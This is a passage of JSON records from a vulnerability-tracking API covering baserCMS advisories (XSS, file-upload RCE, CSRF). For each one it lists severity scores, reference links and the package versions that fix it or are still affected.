                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-29009",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-29009"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-8vqx-prq4-rqrq",
                    "reference_id": "GHSA-8vqx-prq4-rqrq",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-8vqx-prq4-rqrq"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq",
                    "reference_id": "GHSA-8vqx-prq4-rqrq",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/67525?format=api",
                    "purl": "pkg:composer/baserproject/basercms@4.8.0",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-ggv8-3v9t-mfea"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-khft-xvrw-g3dr"
                        },
                        {
                            "vulnerability": "VCID-mfm9-gsh3-ubg8"
                        },
                        {
                            "vulnerability": "VCID-nxrf-64er-xbfx"
                        },
                        {
                            "vulnerability": "VCID-p695-t9ye-v3ga"
                        },
                        {
                            "vulnerability": "VCID-sqr4-v889-tff8"
                        },
                        {
                            "vulnerability": "VCID-uedz-j2vn-cbea"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0"
                },
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/685977?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.0.0-beta1",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-ggv8-3v9t-mfea"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-khft-xvrw-g3dr"
                        },
                        {
                            "vulnerability": "VCID-mfm9-gsh3-ubg8"
                        },
                        {
                            "vulnerability": "VCID-nxrf-64er-xbfx"
                        },
                        {
                            "vulnerability": "VCID-p695-t9ye-v3ga"
                        },
                        {
                            "vulnerability": "VCID-sqr4-v889-tff8"
                        },
                        {
                            "vulnerability": "VCID-uedz-j2vn-cbea"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0-beta1"
                }
            ],
            "aliases": [
                "CVE-2023-29009",
                "GHSA-8vqx-prq4-rqrq"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g56w-z9cx-5ygv"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/47107?format=api",
            "vulnerability_id": "VCID-ggv8-3v9t-mfea",
            "summary": "baserCMS Cross-site Scripting vulnerability in Site search Feature\nThere is an XSS vulnerability in the site search feature of baserCMS.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-44379",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00622",
                            "scoring_system": "epss",
                            "scoring_elements": "0.70549",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-44379"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_73283159",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_73283159"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44379",
                    "reference_id": "CVE-2023-44379",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44379"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-66c2-p8rh-qx87",
                    "reference_id": "GHSA-66c2-p8rh-qx87",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-66c2-p8rh-qx87"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87",
                    "reference_id": "GHSA-66c2-p8rh-qx87",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/69105?format=api",
                    "purl": "pkg:composer/baserproject/basercms@5.0.9",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-khft-xvrw-g3dr"
                        },
                        {
                            "vulnerability": "VCID-mfm9-gsh3-ubg8"
                        },
                        {
                            "vulnerability": "VCID-p695-t9ye-v3ga"
                        },
                        {
                            "vulnerability": "VCID-sqr4-v889-tff8"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9"
                }
            ],
            "aliases": [
                "CVE-2023-44379",
                "GHSA-66c2-p8rh-qx87"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ggv8-3v9t-mfea"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/41362?format=api",
            "vulnerability_id": "VCID-hpk4-a6tr-3ffe",
            "summary": "baserCMS is an open source content management system with a focus on Japanese language support. A Cross-site Scripting vulnerability has been identified.",
            "references": [
                {
                    "reference_url": "http://jvn.jp/en/jp/JVN14134801/index.html",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "http://jvn.jp/en/jp/JVN14134801/index.html"
                },
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-39136",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0054",
                            "scoring_system": "epss",
                            "scoring_elements": "0.67989",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.0054",
                            "scoring_system": "epss",
                            "scoring_elements": "0.6795",
                            "published_at": "2026-06-04T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-39136"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_14134801",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_14134801"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/commit/568d4cab5ba1cdee7bbf0133c676d02a98f6d7bc",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/commit/568d4cab5ba1cdee7bbf0133c676d02a98f6d7bc"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-hgjr-632x-qpp3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-hgjr-632x-qpp3"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39136",
                    "reference_id": "CVE-2021-39136",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-39136"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/58790?format=api",
                    "purl": "pkg:composer/baserproject/basercms@4.5.1",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-5ay3-1t5g-vycu"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-891u-x525-ykbb"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-ays7-6wvh-augt"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-g56w-z9cx-5ygv"
                        },
                        {
                            "vulnerability": "VCID-ggv8-3v9t-mfea"
                        },
                        {
                            "vulnerability": "VCID-j37y-gws9-ake9"
                        },
                        {
                            "vulnerability": "VCID-jby7-s5ez-dqb3"
                        },
                        {
                            "vulnerability": "VCID-k575-suuf-7bhf"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-khft-xvrw-g3dr"
                        },
                        {
                            "vulnerability": "VCID-kmpp-6j49-pqfz"
                        },
                        {
                            "vulnerability": "VCID-mfm9-gsh3-ubg8"
                        },
                        {
                            "vulnerability": "VCID-nxrf-64er-xbfx"
                        },
                        {
                            "vulnerability": "VCID-p695-t9ye-v3ga"
                        },
                        {
                            "vulnerability": "VCID-pd8c-9d7z-zkhg"
                        },
                        {
                            "vulnerability": "VCID-sqr4-v889-tff8"
                        },
                        {
                            "vulnerability": "VCID-u16w-rbuk-ybfs"
                        },
                        {
                            "vulnerability": "VCID-uedz-j2vn-cbea"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        },
                        {
                            "vulnerability": "VCID-zsgc-fnen-b7a6"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.1"
                }
            ],
            "aliases": [
                "CVE-2021-39136",
                "GHSA-hgjr-632x-qpp3"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hpk4-a6tr-3ffe"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/44713?format=api",
            "vulnerability_id": "VCID-j37y-gws9-ake9",
            "summary": "Unrestricted Upload of File with Dangerous Type\nbaserCMS is a Content Management system. Prior to version 4.7.5, there is a Remote Code Execution (RCE) Vulnerability in the management system of baserCMS. Version 4.7.5 contains a patch.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-25654",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.02083",
                            "scoring_system": "epss",
                            "scoring_elements": "0.84309",
                            "published_at": "2026-06-04T12:55:00Z"
                        },
                        {
                            "value": "0.02083",
                            "scoring_system": "epss",
                            "scoring_elements": "0.84332",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-25654"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/commit/002886be0998c74c386e04f0b43688a8a45d7a96",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/commit/002886be0998c74c386e04f0b43688a8a45d7a96"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/commit/08247f0a633d8e836ce2e5cd2d53aa19901a1359",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/commit/08247f0a633d8e836ce2e5cd2d53aa19901a1359"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/commit/60f83054d8131b0ace60716cec7e629b5eb3a8f0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/commit/60f83054d8131b0ace60716cec7e629b5eb3a8f0"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/releases/tag/basercms-4.7.5"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25654",
                    "reference_id": "CVE-2023-25654",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25654"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-h4cc-fxpp-pgw9",
                    "reference_id": "GHSA-h4cc-fxpp-pgw9",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-h4cc-fxpp-pgw9"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-h4cc-fxpp-pgw9",
                    "reference_id": "GHSA-h4cc-fxpp-pgw9",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:31:00Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-h4cc-fxpp-pgw9"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/64369?format=api",
                    "purl": "pkg:composer/baserproject/basercms@4.7.5",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-3new-f12y-8bf9"
                        },
                        {
                            "vulnerability": "VCID-4zw8-truk-pugf"
                        },
                        {
                            "vulnerability": "VCID-7x3n-4c2b-nfbx"
                        },
                        {
                            "vulnerability": "VCID-8buz-nsr9-3yge"
                        },
                        {
                            "vulnerability": "VCID-8ssu-umet-37bk"
                        },
                        {
                            "vulnerability": "VCID-d1sf-cmct-zbh1"
                        },
                        {
                            "vulnerability": "VCID-g56w-z9cx-5ygv"
                        },
                        {
                            "vulnerability": "VCID-ggv8-3v9t-mfea"
                        },
                        {
                            "vulnerability": "VCID-jby7-s5ez-dqb3"
                        },
                        {
                            "vulnerability": "VCID-k5qv-4yp3-zbgf"
                        },
                        {
                            "vulnerability": "VCID-khft-xvrw-g3dr"
                        },
                        {
                            "vulnerability": "VCID-mfm9-gsh3-ubg8"
                        },
                        {
                            "vulnerability": "VCID-nxrf-64er-xbfx"
                        },
                        {
                            "vulnerability": "VCID-p695-t9ye-v3ga"
                        },
                        {
                            "vulnerability": "VCID-pd8c-9d7z-zkhg"
                        },
                        {
                            "vulnerability": "VCID-sqr4-v889-tff8"
                        },
                        {
                            "vulnerability": "VCID-u16w-rbuk-ybfs"
                        },
                        {
                            "vulnerability": "VCID-uedz-j2vn-cbea"
                        },
                        {
                            "vulnerability": "VCID-y2sz-c6vb-pkdp"
                        },
                        {
                            "vulnerability": "VCID-zqd4-rdem-jfgk"
                        },
                        {
                            "vulnerability": "VCID-zxns-tzw3-27fr"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.5"
                }
            ],
            "aliases": [
                "CVE-2023-25654",
                "GHSA-h4cc-fxpp-pgw9"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-j37y-gws9-ake9"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/46310?format=api",
            "vulnerability_id": "VCID-jby7-s5ez-dqb3",
            "summary": "Cross-Site Request Forgery (CSRF) in baserproject/basercms.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-43649",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00118",
                            "scoring_system": "epss",
                            "scoring_elements": "0.3025",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-43649"
                },
                {
                    "reference_url": "https://basercms.net/security/JVN_99052047",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "4.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/"
                        }
                    ],
                    "url": "https://basercms.net/security/JVN_99052047"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms"
                },
                {
                    "reference_url": "https://github.com/baserproject/basercms/commit/874c55433fead93e0be9df96fd28740f8047c8b6",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "4.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T20:21:18Z/"
                        }
                    ],
                    "url": "https://github.com/baserproject/basercms/commit/874c55433fead93e0be9df96fd28740f8047c8b6"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43649",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
